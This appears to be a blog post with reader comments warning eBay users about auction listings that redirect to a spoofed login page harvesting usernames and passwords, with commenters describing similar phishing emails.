Tonight while surfing a few Ebay auctions… i came across a pretty bad, and suspicious exploit that running around Ebay now. Im contacting Ebay as i write this…
When ur searching for items, I came to a bunch of item, that when click on to see more of, would quickly redirect to another page, a login page.
Here’s the initial page:
I clicked on the Supra ad, with the RED BOX around it… It automatically redirected me to this page:
Notice the URL, spoofed page… After u enter your information it will automatically transfer u to the REAL Ebay login. To someone that doesnt pay attention, you might not be concerned with this and continue to login again.
The severity of this issue is great, because the links and redirections are happening automatically within the REAL Ebay site. Not to mention the loggin of your username and password, and forwarding to countless individuals whom created the spoof page. Now they have access to a TON of personal information.
I have a feeling that the redirection is occuring within the HTML of the auction itself. So immediatly once a person click on the link, the HTML within the Ebay description, executes a redirection within “_self” …
Either way, PAY VERY close attention to what your doing on Ebay, and every site for that matter. I hope they address this quickly, before tooo many people are hit. While surfing some more, i found A TON of new ad, an links with this… everything from Auto ads, to computer gear…
While looking closer into the Source of the “spoofed” page, you’ll see that the information u enter into the “Form” (using Form structure) is being sent to -> “fleasca10@gmail.com”
So the guy/gal is recieveing a TON of new usernames and passwords… What a chump…
Yea you should know that you dont need to be signed in just to view an auction and asking for you to sign like that is a big give away. But I guess that happens to fast people wont realise it.
If anyone notices one of these again, I have a contact at ebay(through work) that will shut these down right away, all I have to do is email her
I get about 5-6 emails a day that look like someone has sent you a question on one of your items. then when you click on it, takes you to the same page to login
i like how it says the account protection tips, if u were to see that and check the address you might be like, oh shit close call. but ppl dont even look at that shit. I get a million and a half of these via email trying to get my info via fake paypal sites